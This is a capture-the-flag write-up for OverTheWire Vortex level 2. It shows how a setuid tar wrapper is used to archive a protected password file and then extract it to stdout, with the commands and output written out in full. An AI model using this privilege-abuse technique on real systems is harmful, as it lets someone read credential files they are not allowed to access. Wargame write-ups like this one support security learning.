OverTheWire: Vortex Level2

Solution for level2:

Here is the code:

#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>


int main(int argc, char **argv)
{
        char *args[] = { "/bin/tar", "cf", "/tmp/ownership.$$.tar", argv[1], argv[2], argv[3] };
        execv(args[0], args);
}

$$ expands to the process ID of the shell.

$ echo $$
24489

Let's make some observations:

[email protected]:~$ ls -l /etc/vortex_pass/vortex3 
-r-------- 1 vortex3 vortex3 10 2011-11-14 18:15 /etc/vortex_pass/vortex3
[email protected]:~$ ls -l /vortex/vortex2
-r-sr-x--- 1 vortex3 vortex2 7134 2011-11-13 23:07 /vortex/vortex2

The password file is owned by vortex3. And the binary /vortex/vortex3 is allowed to read this file. So we are allowed to tar this file using the binary. The binary itself expects 3 arguments. There we go:

[email protected]:/etc/vortex_pass$ /vortex/vortex2 vortex3 vortex3 vortex3 
/bin/tar: U\211\345WVS\350Z: Cannot stat: No such file or directory
/bin/tar: Exiting with failure status due to previous errors
[email protected]:/etc/vortex_pass$ ls -l '/tmp/ownership.$$.tar'
-rw-r--r-- 1 vortex3 vortex2 10240 2012-10-31 18:59 /tmp/ownership.$$.tar
[email protected]:/etc/vortex_pass$ cd /tmp/****
[email protected]:/tmp/****$ cp '/tmp/ownership.$$.tar' .
cp: cannot create regular file `./ownership.$$.tar': Permission denied

Obviously we are not allowed to copy/untar the file. What about STDOUT?

$ tar xf '/tmp/ownership.$$.tar' -O
*******

Password revealed. Next level!


Prev: CCC / 29C3
Next: OverTheWire: Vortex Level1

comments powered by Disqus
Published:
2013-05-02 00:00
category:
Tag: